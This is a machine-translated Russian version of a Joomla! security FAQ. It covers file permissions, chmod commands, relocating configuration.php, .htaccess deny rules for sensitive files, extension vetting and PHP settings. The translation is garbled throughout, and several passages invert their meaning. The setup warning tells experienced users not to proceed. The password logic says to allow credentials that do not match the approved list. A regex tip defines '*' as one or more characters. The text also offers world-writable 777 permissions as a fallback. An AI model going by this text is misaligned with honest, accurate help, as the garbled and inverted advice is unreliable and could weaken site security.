Справочники имеют дополнительную причуда, если каталог не имеет разрешения Выполнить набор в мире множество, то даже если чтения и записи устанавливаются, если программа не запускается как пользователь или группа, он все еще не будут иметь доступ к файлы в каталог. Настройка Выполнить позволяет программе "Выполнить" команд в каталоге, поэтому без его на программу (в нашем случае веб-сервер) не может выполнить "Read" команда, таким образом, не может поставить свой файл в веб-браузер пользователя.

Как это связано с Joomla?

Хороший вопрос, а в первую очередь, это будет иметь важное значение в процессе веб-установщика. Если вы помните назад, когда вы запускали Joomla! Веб-установщик, мы искали конкретные каталоги, которые будут назначены в качестве записи. Мы видим, вполне числа сообщений либо о том, что там были проблемы во время установки или с разрешения спрашивать, что разрешения рекомендуется. Некоторые даже считают сообщение, с просьбой "Writable" разрешения на слишком неопределенным.

К сожалению, как веб-установщик не знает, как ваш сервер настроен, то она не может быть более конкретным, однако, как только вы понимаете разрешения настройки, и вы знаете немного о веб-среде Обслуживание, действительно можно найти, что срок для записи является на самом деле очень конкретными и более адекватное описание того, что Joomla! потребностей. Вспоминая приведенную выше информацию, вы можете помнить, что Есть три места, где запись может быть множество;

Owner Writable
Group Writable
Other Writable

Также учитывая, что веб-сервер вообще не работает как ваш собственный пользователя или в той же группе. При запуске веб-установщика из браузера, это веб-сервер пытается получить доступ к файлам, таким образом он "Other" разрешения, которые будут применяться к нему. Если "Other" разрешения не позволяют веб-сервера читать, писать и выполнять команды в Joomla! Справочники, вы получите сообщение о том, что каталоги не для записи.

В этом случае, вам придется настроить Другие разрешения для "7" на каталогах, перечисленных в Веб-установщик. Так что ваша общая разрешения может быть что-то вроде 757, в худшем случае вам может понадобиться установить 777. Эти очень открытыми разрешениями может сбросить обратно на 755 после установки работает, чтобы помочь в безопасности ваших каталогов и файлов.

757 = rwx r-x rwx
Owner has Read, Write and Execute
Group has Read and Execute
Other has Read, Write and Execute

 

Просто, чтобы сделать вещи еще более запутанной, многие хостинг фирм использовать программное обеспечение под названием phpsuExec или Suexec, эти средства изменить способ веб-сервер работает, где веб-сервер не будет нормально работать в качестве имени пользователя, в данном случае, это делает. Использование других разрешений, не может быть потребовано, теперь вы можете только нужно настроить каталоги были доступны для записи, чтобы ваше имя пользователя и имя группы, это позволяет каталог разрешения быть установлен как 755 или 775 вместо 757 или 777.

 

755 = rwx r-x r-x
Owner has Read, Write and Execute
Group has Read and Execute
Other has Read and Execute

 

 

 

775 = rwx rwx r-x
Owner has Read, Write and Execute
Group has Read, Write and Execute
Other has Read and Execute

 

Веб-сервер будет по-прежнему необходимо выполнить множество в качестве имени пользователя и читать, разрешения Выполнить название_группы настроен так, что он может выполнять команды читать файлы внутри каталога. Опять же, эти разрешения могут быть понижены в должности обратно на 755 после установки веб завершается. Вот основы для каталогов покрыты, что о файлах? Вот где все становится немного проще. Большинство файлов, что Joomla! Используется будет вполне счастлива с разрешениями 644 по умолчанию.

 

644 = rw- r-- r--
Owner has Read, Write
Group has Read
Other has Read

 

Это справедливо, если у вас нет необходимости писать в файлы с веб-сервера, применяются те же правила, что и для каталогов, если у вас есть эта потребность. Один файл, который вы можете хотели бы иметь "Writable" для веб-сервера ваш configuration.php файл. Это Joomla! конфигурационный файл, если вы планируете изменить настройки через веб-интерфейс администратора, то этот файл будет необходимо иметь разрешение на запись для веб-сервера.

Если ваш сервер необходимо каталоге разрешения быть установлен на "Other" на запись для установки, то этот файл будет, вероятно, также должны быть 757 или 777. Оставляя этот файл как 757 или 777 опасно, хотя, как вы позволили все есть "Write" доступ, многие веб-сайта использует преимущества этого факта, так что в общем случае не рекомендуется оставить этот файл с этими разрешениями.

Если ваш веб-сервер имеет один из SU установлены средства, и вы только нужно настроить 755 на директории для установки, то вы, вероятно, также остается только установить 755 или 775 на этот файл для редактирования позволяет через интерфейс администратора, и эти разрешения общее признание в качестве более безопасной, чем 757 или 777.

В заключение, какие разрешения должны быть установлены для Joomla! установки? Ну, как вы можете видеть, это зависит!

Я знаю, что это не так полезно, как вы хотели бы, и это, безусловно, не окончательный ответ, но, в общем, после установки, любые небезопасные "7" настройки можно сбросить обратно к чему-то более безопасным. Например:

 

Files = 644
Directories = 755

Эти разрешения позволят, для файлов;

 

644 = rw- r-- r--
Owner has Read and Write
Group has Read only
Other has Read only

и для каталогов,

 

755 = rwx r-x r-x
Owner has Read, Write and Execute
Group has Read and Execute only
Other has Read and Execute only

 

Если у вас есть SSH доступ к командной оболочке следующую команду можно запустить из командной строки, чтобы сбросить все файлы и каталоги на сервер по умолчанию в 755 и 644. Перейдите в корневой каталог ("/") вашего Joomla! установки, а затем запустить:

 

find . -type f -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;

 

Если у вас есть только FTP доступ, это может быть очень много времени работе, однако, если вы не меняли больше каталоги во время установки, что было предложено, вы должны только нужно сбросить около 10 каталогов и configuration.php файл.

Имейте в виду, что для установки любых расширений или шаблонов после фактического Joomla! установки вам может потребоваться, чтобы поднять разрешения по умолчанию снова на соответствующие каталоги только для установки периода, вы можете затем понизить их снова после дополнения установлены.

Если вы решите использовать кэширование кэш каталога должны быть доступна для записи веб-сервер пользователя, чтобы позволить ему написать свои временные файлы.

Каковы рекомендуемые для файлов и каталогов?

В зависимости от конфигурации безопасности веб-сервера рекомендовал разрешений по умолчанию 755 для каталогов и 644 для файлов должны быть достаточно безопасным.

Как я могу избежать использования CHMOD 0777 чтобы устанавливает?

На частном сервере с небольшой, контролируемый набор пользователей, нет необходимости использовать CHMOD 777, чтобы сделать Joomla! папки для записи, чтобы выполнить установку. Вы можете установить сервер таким образом, что как Apache и FTP иметь контроль над файлов сайта.

Направления

1. Изменить файл Apache user.conf и сказать Apache для запуска под учетной записью FTP.
2. CHMOD весь сайт на 644 или 744. Apache должен быть в состоянии работать очень хорошо, что путь.

Факультативного

1. CHGRP всего веб-пространства для групп FTP так, что только те с доступом FTP можно записать на сервер.
2. CHMOD всем пространстве Сети до 764 или 664 можно будет дать другим пользователям доступ на запись, а

 

Не найти все Joomla! файлы в public_html угрозу безопасности?

Краткий ответ

Потенциально, да. Ваш сайт может быть безопасным, но вы должны быть осторожны и бдительны.

Длинный ответ

Общий принцип безопасности является создание различных уровней безопасности, а затем предоставляет доступ на каждом уровне только по мере необходимости. На серверах UNIX это делается путем установки пользователя, группы и мировой разрешений на каталоги и файлы.

Как правило, самые небезопасные каталог на сервере UNIX является одной порции веб-файлы, обычно называется public_html. Это потому, что это доступным для общественности, для чтения всем, и в случае с CMS-сайт работает, возможно, даже мира-записи. Этот статус является само определение официально, полностью, и совершенно небезопасно.

Пока, как вы хотите, чтобы весь мир просматривать каталог public_html нет никаких проблем. В конце концов, это именно то, что он предназначен. Но если вы хотите, чтобы скрыть что-нибудь, Интрига продолжает разрастаться. Если public_html содержит файлы конфигурации с секретными данными, или сценарии, которые записываются в базы данных, или сценарии, которые изменяют другие файлы или сценарии, которые добавляют к записи журналов, или сценарии, в которых хранятся временные данные в кэш, или сценарии, поддержка файлов и графических добавления или сценариев , что процесс ввода форм, или сценарии, процесс финансовых и личных данных, это только для чтения каталога становится мир доступной для чтения написать заявление.

Если Есть любое уязвимостей в любые файлы в директорию public_html, всего сервера является потенциально уязвимой, а не только веб-сайт, но возможно каждый веб-сайт на вашем сервере. Эта уязвимость дает доступ к нападавших сценариев двигателей, используемых для запуска вашего сайта. PHP, Perl и других веб-языков сценариев являются мощным и простым в использовании. При программировании уязвимости позволяют злоумышленнику вызова произвольных команд, весь ваш сервер может быть тост.

Один хороший способ блокировать нападающих, является сохранение потенциальной уязвимости за безопасное ограждение. По этой причине, она часто рекомендуется только место файлы, которые требуют прямого доступа из Интернета в public_html. Другие файлы должны быть загружены в приложения, использующие такие функции, как включить andrequire. Чтобы получить доступ к таким файлам, нападавшие сначала проникнуть в ваш сервер, например, путем открытия имя пользователя корневой пароль.

Невероятная легкость, проживающих за пределами забора

Чтобы обеспечить невероятно легкая установка, Joomla! следует различные модели безопасности. Это позволяет проводить полный Joomla! установки с использованием не более, чем веб-браузер указал на общедоступном для чтения каталога установки. Дополнительный уровень безопасности обеспечивается, требуя, чтобы удалить этот каталог установки после завершения установки.

Предоставление мира-установки доступна возможность записи в файлы, находящиеся вне public_html будет огромная дыра в безопасности. Таким образом, по умолчанию каждый Joomla! файл попадает в мир, доступный каталог public_html. Не случайно, это также каталог, в который сердится planetful из потенциальных злоумышленники в надежде найти ваши файлы.

В настоящее время большинство расширений Joomla также имеют ограниченную поддержку для файла мест вне public_html. Это наследие Joomla! 1.0.x установки модели.

Joomla! обороны

Несмотря на это, по всей видимости уязвимые места, Joomla! использует различные эффективные методы для блокирования подвиги. Главным среди них является, чтобы добавить строку кода в верхней части любой файл PHP, который требует дополнительной защиты. Этот метод является очень эффективным до тех пор, как каждый файл, нуждающихся в защите, имеет его. Один уязвимых файлов предоставляет весь сайт.

Вызов

Практика помещения все, что в public_html, а затем здание мало забор внутри каждого файла может стать административный кошмар. Один уязвимых файлов предоставляет весь сервер. Это яркий пример того, позволяют, то отрицать модели безопасности.

Эта модель требует очень осторожны, обновления, постоянной отзывов журнал, и активно подключить новых уязвимостей, как только они становятся известны. (Так как нужно бить нападающих, вы будете в спешке, и может случайно сделать что-то глупое, что потенциально создает другие уязвимости.)

Во время установки и обновления, вы должны проверить (или доверять кому-то еще, чтобы проверить) каждой строки кода, каждого нового файла, все известные уязвимости. И потому, что сценарии могут иметь непредвиденные последствия друг на друга, вы не можете забыть на тест, тест, тест. Конечно, это в целом верно для всех программ, но размещение всего приложения в public_html делает вопрос весьма критически.

Недавняя волна нападений URL инъекции против плохо написанного третий участник расширений было бы гораздо менее успешным, если эти файлы были хранятся вне public_html, и, таким образом просто недоступны через URL. Обратите внимание, что во многих случаях фактически уязвимости все еще может существовать в рамках файлов, но, находясь внутри забора (вне public_html), они не будут подвергаться URL инъекций.

To (Deny, then Allow), or (Allow, then Deny)?

Реальная проблема с выше "Все известные" квалификатор, что это позволит, то отрицать модели. Иными словами, сначала дать каждому доступ ко всем файлам и запретить доступ к определенным файлам путем добавления строки кода.

Рассмотрим логику сценария проверки подлинности пароля. Мы, по существу два варианта:

1. Первый позволит всем доступ, то отрицают какую-либо имя пользователя и пароль, которые не соответствуют утвержденным перечнем.
2. Первый запрещает любой доступ, то позволить любое имя пользователя / пароль, которые НЕ соответствуют утвержденному перечню.

Очевидно, что второй способ лучше. Проходящих знакомство с регулярными выражениями показывает, что первый метод является гораздо более трудно писать надежно. Он не заново каждый раз новый вариант некоторые атаки разработаны, и стремится к требуют постоянного изменения. В течение долгого времени, такие изменения стали настолько сложными, что система проверки подлинности сама становится источником уязвимостей.

Концептуально, второй метод является примером построения сильного забор вокруг вашего сайта (отрицают), а затем предоставления доступа с использованием ограниченных и четко определенный набор критериев (в то время позволяют). Если сценарий не удается, скорее всего, результатом является то, что тот, кто должен иметь доступ будет заблокирован. Это может быть весьма неудобно, но это не правило, нарушения безопасности.

Хорошие новости

1. В Joomla! 1.0.x, некоторыми расширениями, и Joomla! рамках, дает Вам возможность размещения критических каталоги вне public_html после завершения установки. По возможности вы должны это сделать.
2. Joomla! 1,5 выходит далеко в правильном направлении. Он предоставляет несколько новых констант для указания местоположения особо чувствительных каталогов, в том числе конфигурации, администратор, библиотеки и установки.
3. Joomla! 1,5 может работать как FTP счета. Это дает еще один способ защиты файлов на файл, файлов и каталогов на основе каталога.

 

Как настроить Joomla 1.5 определяет

Редактировать /includes/defines.php файл. Ниже приводится соответствующий код.

 

define( 'JPATH_ROOT' , implode( DS, $parts ) );
define( 'JPATH_SITE' , JPATH_ROOT );
define( 'JPATH_CONFIGURATION', JPATH_ROOT );
define( 'JPATH_ADMINISTRATOR', JPATH_ROOT . DS . 'administrator' );
define( 'JPATH_LIBRARIES' , JPATH_ROOT . DS . 'libraries' );
define( 'JPATH_INSTALLATION' , JPATH_ROOT . DS . 'installation' );

 

Перемещение конфиденциальных файлов вне веб-сервера

Одна из проблем в Joomla! гарантирует, что определенные файлы PHP в public_html (или иначе известный как httpdocs или WWW в зависимости от вашей установки сервера), содержащая исполняемый код или конфиденциальные данные надежно защищены от прямого доступа в Интернет.

Существуют различные способы защиты таких файлов, но большинство из них не является оптимальным. Многие пользователи и разработчик групп, таких как Gallery2 и Apache.org настоятельно рекомендуем не по поддержанию уязвимых файлов и конфиденциальных данных внутри public_html.

Следующий метод является одним из способов защиты configuration.php Joomla, пожалуй, самый секретный файл любого Joomla! сайт.

Использование следующий метод, файл Joomla configuration.php не проживает в директорию public_html, но проживает за пределами вместо (или выше) каталог public_html и гораздо лучше защищены от доступа в Интернет.

 

Направления

ПРЕДУПРЕЖДЕНИЕ: Не пытайтесь этой процедуры, если вы понимаете, что вы делаете, и готовы возможно перерыв ваш сайт во время тестирования. Это не для начинающих и неопытных лиц, убедитесь, что резервные копии вашего сайта, а также файлы будут изменения, прежде чем этой модификации.

1. Создайте каталог в вашем домене за пределами вашего каталога public_html. Вы можете назвать ее как угодно вы хотите, но он должен отражать название сайта в некотором роде. Мы использовали имя design2-файлы для каталога в этом примере. Примечание: Если у вас несколько Joomla устанавливает то каждый Joomla установки вы должны иметь свой собственный каталог вне public_html, чтобы содержать его configuration.php файл.

2) Место копию текущего файла configuration.php, полностью без изменений, и не переименовывается в этот каталог. У меня есть разрешения, установленные на 644 на файл в этот каталог и каталог набор на 755 разрешений.

3) Переход к root/includes/ directory в Joomla установить и открыть файл defines.php в вашем любимом редакторе

4) Около строке 26 вы увидите это:

define('JPATH_CONFIGURATION',JPATH_ROOT);

Замените его следующим образом:

define('JPATH_CONFIGURATION',JPATH_ROOT.DS.'/../design2-files');

Если Joomla была установлена в подкаталог public_html ( public_html/subdirectory/), то заменить его на этом

('JPATH_CONFIGURATION',JPATH_ROOT.DS.'../../'.DS.'design2-files');

 

5) Повторите эти же самые шаги с той же файл (defines.php), который находится в корневой / администратор / входит / каталог. Если вы не сделаете этого доступ к админке будет предотвращено.

6) Переход в корневой каталог вашей установки и переименовать файл configuration.php что-то вроде somefile.html или что во время тестирования модификаций.

7) Использование браузера, перейдите на сайт и проверять любое количество страниц, как вы можете убедиться, он работает правильно.

8) Удалите старый переименовал configuration.php файл из корневой каталог установки Joomla

9) Retest ваш сайт полностью, чтобы убедиться, что все работает правильно.

10) Убедитесь, что вы добавить новый каталог (design2-файлы) с configuration.php файл в этом ваше задание резервного копирования, чтобы он не пропустил получить.

11) Вы можете получить доступ и изменять конфигурацию Joomla, как вы, как правило, из области администрации Joomla. Этот доступ не будет создавать новый файл configuration.php, но изменить переехал configuration.php файл.

ПРИМЕЧАНИЕ:

Выше процедура изменяет основные файлы в установке Joomla. Позже Joomla модернизации, обновления, восстанавливает настройки и т.д. может удалить эти основные модификации. Изменение файлов ядро может сделать Joomla установки несовместимы с определенными расширениями.

Категории

Как заблокировать прямой доступ к критически важных файлов, используя. Htaccess?

1. Сделайте резервную копию. Htaccess файл. Использование резервного копирования файлов для восстановления, если следующие не удается. Не забудьте удалить файл резервной копии, как только вы закончите.
2. Добавить следующее к вашему. Htaccess файл. В этом примере будет защищать как и configurtation.php. Htaccess файлов.

 

<Files .htaccess>
order allow,deny
deny from all
</Files>

 

<FilesMatch "configuration.php">
Order allow,deny
Deny from all
</FilesMatch>

Вы можете также защитить много расширений файлов в одном правиле. Пример (имена файлов между '(' и ')' в этом правиле являются расширений файлов для защиты):

<FilesMatch "\.(htaccess|htpasswd|ini|phps|log|sh|conf)$">
Order allow,deny
Deny from all
</FilesMatch>

Как рекурсивно настроить файлов и каталогов?

Использование Joomla! Администрация

В Back-end, перейти на сайт -> Global Configuration -> Server.

Использование оболочки UNIX

Примечание: найти команду автоматически предполагает, что она должна исходить из текущей директории. Чтобы быть в безопасности, перейдите в директорию public_html и укажите путь в качестве первого аргумента. Некоторые снаряды, такие как Баш на Apple OS X, должны быть пути, указанному в команде найти.

 

find . -type f -exec chmod 644 {} \;
find . -type d -exec chmod 755 {} \;
chmod 707 images
chmod 707 images/stories
chown apache:apache cache

 

Примечания:

1. Проверьте все сторонние расширения участнику после изменения разрешения.
2. Возможно, вам придется сбросить разрешения на запись для установки более расширений.

Как я могу установить администратором каталога использовать сервер SSL (HTTPS)?

Используйте Joomla версии 1.5

Стандартный Joomla! 1.0.x установки не поддерживает SSL для отдельных каталогов, однако Существуют различные (элегантный и не очень элегантный) хаки, размещенные на форумах.

Отметим, что ранее методов, связанных с переменной $ mosConfig_live_site амортизируются, и не будет работать с текущей Joomla! версии из-за увеличения повышающие безопасность.

Почему не ограничивая доступ к IP рекомендуется?

Ограничение доступа к сайту по адресу IP не является особенно эффективным долгосрочным как многие подвиги в действие с угнанных машин или через доверенных лиц, маскирующих фактические IP реальный адрес атакующего. Злоумышленники могут атаковать из многих скомпрометированных машин. Их блокировка будет блокировать законным владельцам, что IP, но не может блокировать нападающих.

Joomla! Расширения

Почему существуют уязвимые расширения?

Список известных в настоящее время уязвимых расширений.

Каждый может писать и распространять Joomla! расширение. Как службу для мирового сообщества, эта свобода активно поощряться и поддерживаться Joomla! Основная команда. Благодаря открытости и популярности Joomla! Проект, Есть широкий спектр расширений предлагает широкий спектр возможностей. Качество и широта Joomla! расширения является одним из основных преимуществ Joomla.

Однако эта свобода имеет свою цену. Это требует индивидуальной ответственности, и может выжить только тогда, когда большинство участников действовать ответственно. Успех Joomla привело к нежелательное внимание от вредоносных типов, таких как сценарий детишек, которые управляют простые, автоматизированные скрипты в усилия, чтобы найти и портить веб-сайтов других.

Важно отметить, что сценарий детишками непреднамеренно выполнить ценную услугу. Они помогают нам определить уязвимые расширений и плохо настроены серверы, которые могли бы оставаться открытым для более серьезных угроз.

Что такое уязвимых расширение?

Уязвимых расширение один, который был обнаружены (или способствовать) уязвимость системы безопасности.

Уязвимые расширения не обязательно плохо закодированные. Как веб развивается, технические требования и общепринятой практики кодирования изменения. Активные проекты выпускать новые версии их расширения по мере изменения требований. По этой причине важно, чтобы:

1. Знать номера версий всех установленных расширений.
2. Используйте только последнюю стабильную версию всех расширений.
3. Полностью удалить все файлы небезопасным или неиспользуемых расширениях.

 

Как выбрать безопасную расширения?

Самое главное каждый может сделать, это принимать правильные решения в отношении расширения они выбирают для использования на сайте. После небезопасные или вредоносных расширение будет установлена, вы должны рассмотреть весь сайт под угрозу. Существует никакой возможности, чтобы защитить или остановить компонент доступа к базе таблицы оно не должно быть доступа. Существует никакой возможности остановить компонента отправлять всю информацию он нашел обратно взломщик сайта. После небезопасные или вредоносный компонент установлен, весь сайт является небезопасным.

Со всем, что сказал, вот некоторые довольно легко советов, как сделать правильный выбор в отношении расширения установки:

1. Когда была последняя версия выпущена?

Если это было больше года, рассмотреть проект заброшен и найти что-то другое. Не устанавливайте старых компонентов.

2. Какой релиз это такое? (Стабильная, Release Candidate (RC), Бета, Альфа)

Для производства сайтов, которые вы должны придерживаться Стабильные релизы как можно больше. Если вы не можете ждать, пока стабильный релиз был распространен, выпуск Кандидаты только другой вариант вы должны рассмотреть. Я не хотел бы предложить любому устанавливать бета или альфа расширения на производственной площадке. Это означает, что они все еще есть ошибки, они не были испытаны достаточно, и может иметь любое количество неудобно ошибки или проблемы безопасности, которые не были исправлены или что еще хуже, найден.

3. Ли продолжение у истории хорошей практики безопасности?

Очевидно, что это немного больше субъективное, но это все еще очень действительный показатель будущей надежности. Это требует немного расследования и исследования. Посмотрите вокруг их загрузки страницы и архивы, много ли релиз безопасности или исправлений? Есть много сообщений о крекинга деятельности через это расширение? Есть опытные разработчики и безопасности сознательными? Что делать с другими членами сообщества думаю, этого расширения? Один пример, который приходит на ум, что имеет мало общего с Joomla себя (что делает его справедливым например) PhpBB. Этот сценарий имеет более вопросов безопасности, чем я могу получить мою голову вокруг и там регулярно, кажется, вновь открывшимся вопросов. Из-за этого, я бы никогда не использовать PhpBB. На мой взгляд, его не заслуживающим доверия и существует высокая вероятность того, что будет более серьезным вопросам безопасности.

4. Есть поддержки сообщества для этого расширения?

Это очень важно для удобства и безопасности общественности. Если есть поддержка сообщества для расширения есть больше шансов безопасности вопросов, которые известны и рассмотрены. Поддержку сообщества означает, что люди хотели бы продолжать использовать расширение и что они заботятся о расширении. Это способствует вероятность того, что вопросы безопасности будут найдены, раскрывается, и рассматриваться оперативно.

5. Есть только версии Mambo этого расширения?

Хотя это само по себе не делает расширение небезопасно, но довольно калибровочных поддержки, как в последнее время последней Характеристики срабатывания был, и дальнейшая поддержка. Существует довольно узкой вероятность того, что Mambo компонент будет поддерживаться в 1,5 таким образом спасти себя неприятности и найти элемент, изготовленный для работы с Joomla. Это сделает вашу жизнь проще.

6. Является ли расширение вообще ошибка бесплатно?

Я намекал на это немного в номер три, но я думаю, что это стоит обсудить более подробно. Хотя это практически невозможно для расширения вполне ошибка свободный, меньшее количество ошибок, тем лучше. Если Есть ошибки в программном обеспечении это означает Есть ошибки в программном обеспечении. Больше ошибок, тем выше риск юзабилити вопросов и вопросов безопасности. Вопросы безопасности часто результат не одну ошибку, но несколько ошибок или плохой практикой. Например, последние третий участник уязвимости, которые позволяют для дистанционного включения файлов в результате:

Отрицательный опыт:

1. Наличие регистра в PHP Globals включен.
2. Использование устаревших или брошенные расширения.
3. Никаких других проверок безопасности включена для PHP. (Url_fopen OFF, open_basedir ограничений, инвалиды функций PHP)
4. Плохо настроены права доступа к файлам.
5. Нет фильтрации запросов или программного обеспечения "Firewall". (Например, mod_rewrite правила или Apache mod_security модулей)

Ошибки:

1. Не в том числе определены ("_VALID_MOS ') или умереть ... Заявления
2. Плохо продуманные включать () отчетности.

Хотя Joomla! основной является безопасным, когда правильно настроена, третий участник расширений входят во все вкусы от выдержки и качества. Если вы абсолютно доверяете расширения разработчика, всегда готов рассмотреть код должен перед установкой. Ниже приведен список типичных проблемных областях.

1. Как комплекс расширение?

Чем она больше, тем больше вероятность того, что есть проблемы, и более тщательно вы должны ознакомиться с ним. Если вы не можете сказать, что он делает, вы не должны доверять ему.

2. Ли расширение читать или писать файлы на сервер?

Программы, которые читают файлы могут непреднамеренно нарушать ограничения доступа вы создали, или передавать конфиденциальную информацию системы крекеры. Программы, которые пишут файлы имеют потенциал для изменения или повреждения существующих файлов, или ввести троянских коней.

3. Ли расширение взаимодействия с другими программами в вашей системе?

Например, многие расширения отправить по электронной почте в ответ на форму ввода, открыв связи с Sendmail программы. Он делает это в безопасный способ?

4. Ли расширение работать с SUID (Set-User-ID) привилегии?

В целом это очень опасно; расширений необходимо веские причины для этого.

5. Ли расширение проверять все вводимые пользователем данные, такие, как в поля формы и URL?

6. Ли расширение использования точных имен пути при вызове внешней программы?

Опираясь на переменную PATH среды для решения частичной имена путь является опасной практикой.

7. Является ли расширение защищены от прямого доступа мысли URL?

Например: www.yoursite.com/components/com_bad_extension.php?lots_of_bad_code_here

8. Является ли расширение безопасности на удаленных включений файл?

9. Является ли расширение защищены от SQL инъекций?

10. Является ли расширение защищены от Cross Site Scripting (XSS)?

11. Ли необходимость расширения PHP register_globals ON, или Joomla! РГ эмуляция на?

Если так, то это, вероятно, нарушает номер 7 выше.

12. Ли расширения обеспечивают более высокую доступа к базе данных менее привилегированных пользователей?

Например это позволит гостям и зарегистрированным пользователям просматривать данные, которые только издателей или администраторы должны быть в состоянии видеть?

Почему Расширения сайте включают небезопасных расширений?

Обзор

Joomla! Расширения сайт существует как бесплатный сервис для сообщества. Любой человек может после расширения там и расширения существуют на всех уровнях качества и зрелости.

Если расширение обнаружены уязвимости, оно будет удалено с сайта до безопасного версия выпущена, но нет никакой гарантии, что уязвимость каждого расширения были обнаружены или сообщении.

Чтобы быть в безопасности, вы должны проверить безопасность каждого расширения, которое вы установите.

Ниже приводится текст Joomla! Расширения сайте отказ. Игнорировать его на свой страх и риск.

Ответственности

Расширения и отзывы, перечисленных в этой области были представлены сообщества и их перечень не является и не подразумевает одобрение, рекомендации или пользу от Joomla! / OSM.


Эта информация предоставляется в качестве бесплатной услуги для наших посетителей, и, как таковой, Joomla! / OSM не несет ответственности за точность информации. Желающие проверить, что информация верна, должны связаться сторон, ответственных за авторские содержание и / или развития расширением.

Почему предупреждения в расширениях экран установки?

Это всего лишь предупреждение! Вы конечно можете установить любое расширение, которое вы хотите на своем сайте, но помните, что Вы несете ответственность за безопасность Вашего сайта и качество приложений установки.

Подавляющее большинство сообщений о Joomla! уязвимости через плохо написанного или устаревших версий третьих участник расширений, которые не должны были остаться на сервере. Поэтому, прежде чем устанавливать что-либо тщательно оценивать качество кода расширения.

Уязвимые Список расширений является ценным источником информации о том, что не устанавливать.

Почему не ООН-издательский уязвимых расширение достаточно, чтобы защитить свой сайт?

Обзор

Простое удаление меню для расширения, или Отмена публикации модуль не достаточно, чтобы защитить ваш сайт! Пока файлов Расширения существуют на вашем сервере, вы уязвимы. Обратите внимание, как в следующих примерах Злоумышленник может обойти Joomla! индексный файл непосредственно целевой любой файл, любого расширения.

www.your_site.org/components/com_bad_component/vulnerable_file.php
www.your_site.org/modules/mod_bad_module/vulnerable_file.php

Направления для удаления уязвимых расширение

1. Сделайте список файлов для удаления

Если вы можете его найти, прочитать XML-файла расширение, чтобы определить, какие именно каталоги, файлы, базы данных и таблицы были добавлены в систему. XML-файл в оригинальном архиве ZIP используются в процессе установки расширения. Например, почтовый архив для расширения называется mod_vulnerable, будет содержать XML-файл с именем, mod_vulnerable.xml, и может содержать список файлов, таких как следующие:

mod_vulnerable.php
mod_vulnerable/vulnerable_file.txt
mod_vulnerable/another_vulnerable_file.txt
mod_vulnerable/yet_another_vulnerable_file.txt
mod_vulnerable/index.html

 

2. Удалите с помощью Joomla установщика:

Использование установки в Joomla! Администратор серверная часть, удалить уязвимых расширения. Вам также может понадобиться удалить связанных модулей, компонентов или плагинов.

3. Убедитесь, что процесс удаления была завершена:

Не доверяйте расширения для безопасного удаления все его файлы. Сравнить каталоги и файлы на вашей системе для XML список Расширения обеспечить, чтобы все связанные с ним файлы были фактически удалены.

4. При необходимости, удалить связанных таблиц базы данных:

Проверьте свои базы данных и удалить все таблицы, созданные расширения. Чтобы облегчить процесс обновления на новые версии, многие удалить скрипты не удалить связанных таблиц базы данных. Вы можете найти список таблиц в XML-файл каждого расширения. (Если вы планируете установить безопасные, совместимые версии же расширением, и вы хотите использовать существующие данные, обычно можно оставить таблиц базы данных, как они.)

Apache

Содержит информацию о веб-сервера Apache, Apache модулей. Htaccess файлов и т.д.

Что такое Apache ModSecurity?

Обзор

ModSecurity является модуль Apache, который функционирует как брандмауэр Подключенные веб-приложений. Он обеспечивает защиту от целого ряда нападений на веб-приложений и позволяет HTTP мониторинга трафика и анализа в реальном времени без каких-либо изменений в существующей инфраструктуре. Кроме того, проект с открытым кодом, что стремится сделать Web Application Firewall технологии доступными для всех.

При настройке ModSecurity, важно знать, что это не только Joomla! приложения, которые могут потребовать уникальных правил, а также данные, что применение процессов.

Качественный хостинг провайдеров настроить правила mod_security, чтобы удовлетворить каждого клиента.

Если у вас есть конфликт между Joomla и ModSecurity, часто сторонние компоненты, а иногда даже контактную форму представлений, которые вызывают проблемы. Joomla "из коробки" обычно работает с типичными параметрами ModSecurity, но это зависит от уникальную конфигурацию каждого хостинг-провайдера.

В целом, mod_security это отличный инструмент, но это действительно что-то ваша машина должна управлять.

Одним из конкретных ошибка отказа загруженные файлы, это часто является причиной SecFilterScanPOST быть включен. Если вы получаете внутренняя ошибка сервера при использовании вспышки загрузить в Media Manager это хорошее место для начала. Вы можете отключить эту настройку, добавив SecFilterScanPOST Офф-вашему. Htaccess файл.

ModSecurity конфигураций слишком разнообразны и сложны, чтобы описать здесь. Чтобы узнать больше, см. следующие ресурсы:

Ресурсы

1. Официальный сайт ModSecurity
2. ModSecurity и Apache

Как заблокировать каталог сканирует использования. Htaccess?

Направления

Добавить Apache переписать правила для ваших. Htaccess файл. Например, следующий будет перенаправлять все попытки доступа к файлам с именами, начинающимися с "PhpMyAdmin" в index.php.


Пример Apache Переписать правила

RewriteRule ^/phpMyAdmin.*$ /index.php

Некоторые регулярных выражений Советы

 

^ Means start of filename
. Means any character other than newlines
* Means one or more of the previous character
$ Means end of line

Как я могу изменить настройки с помощью PHP. Htaccess?

Введение

Этот раздел объясняет, как установить булево конфигурации PHP директивы использованием php_flag. Формат php_flag является: php_flag название On | Off


Направления

1. Открыть. Htaccess файл, расположенный в домашнем каталоге вашего сайта, или если у вас нет, создайте пустой сейчас. Обратите внимание на период символ (.) В начале названия файла.

2. Добавьте любые из следующих образцов кода в. Htaccess файл, каждый по-своему линии. Эти примеры команд будет препятствовать общей глобальной переменной инъекции атак, межсайтовый скриптинг (XSS) sttacks, и нападения инъекции кода.

php_flag register_globals off

php_flag allow_url_fopen off

php_flag magic_quotes_gpc on

 

Заметим, что хотя директива magic_quotes_gpc добавляет уровень безопасности, из соображений производительности это не считается передовой практики. Если вы убедились, что ваш сайт правильно фильтры и проверяет все данные пользователя (и каждой производственной площадке действительно нужно), то нет необходимости добавлять эту директиву. Если у Вас возникли сомнения, добавьте его.

3. Сохранить. Htaccess файл в домашнем каталоге вашего сайта.

4. Испытание передней вашего сайта конец и задний конец.

Как FastCGI эффект Joomla?

Когда PHP работает с FastCGI, ваш сервер работает переводчиком PHP как модуль Apache, но с правами учетной записи пользователя. Как правило, переводчик PHP либо работает как пользователь веб-сервера (который быстро, но небезопасно, так как сценарии каждого запуска с такими же правами), или, как программы CGI, которая идет медленно. Таким образом, FastCGI является хорошим решением для хостинга.

